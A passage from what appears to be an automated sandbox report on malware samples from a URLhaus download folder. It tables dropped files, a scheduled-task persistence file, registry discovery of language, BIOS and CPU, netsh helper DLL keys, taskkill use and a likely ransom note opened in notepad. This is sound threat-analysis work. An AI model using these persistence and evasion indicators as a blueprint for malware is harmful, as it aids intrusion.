| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_nl.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_sv.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_el.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_pt-PT.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdate.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bg.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\http.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\langla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\msf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\palladiums\translucently.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ping.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ping.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772974190804545" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ = "IAppVersionWeb" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ = "IBrowserHttpRequest2" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\ELEVATION | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\INPROCSERVER32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\VersionIndependentProgID | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ = "Google Update Legacy On Demand" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\VersionIndependentProgID | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\"" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69} | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\ = "IPolicyStatusValue" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\VersionIndependentProgID | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachineFallback\CLSID\ = "{598FE0E5-E02D-465D-9A9D-37974A28FD42}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\ = "IAppCommand" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\goopdate.dll,-1004" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\LocalizedString = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\goopdate.dll,-3000" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback\CurVer\ = "GoogleUpdate.OnDemandCOMClassMachineFallback.1.0" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\ELEVATION | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\ = "Google Update Policy Status Class" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\NumMethods\ = "4" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\NumMethods\ = "12" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods\ = "24" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\GoogleUpdate.exe | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\VERSIONINDEPENDENTPROGID | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\NumMethods\ = "7" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ = "IProgressWndEvents" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\VersionIndependentProgID\ = "GoogleUpdate.Update3WebMachine" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachineFallback\ = "Google Update Legacy On Demand" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.PolicyStatusMachineFallback\ = "Google Update Policy Status Class" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\NumMethods | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods\ = "10" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ = "IJobObserver" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\ = "Google Update Broker Class Factory" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6365D39F-2E73-4837-BC59-2014AAA20FA7}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\psmachine_64.dll" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32\ = "{6365D39F-2E73-4837-BC59-2014AAA20FA7}" | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\LOCALSERVER32 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\LOCALSERVER32 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\LocalServer32\ = "\"C:\\Program Files (x86)\\Google\\Update\\1.3.36.352\\GoogleUpdateOnDemand.exe\"" | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B} | C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
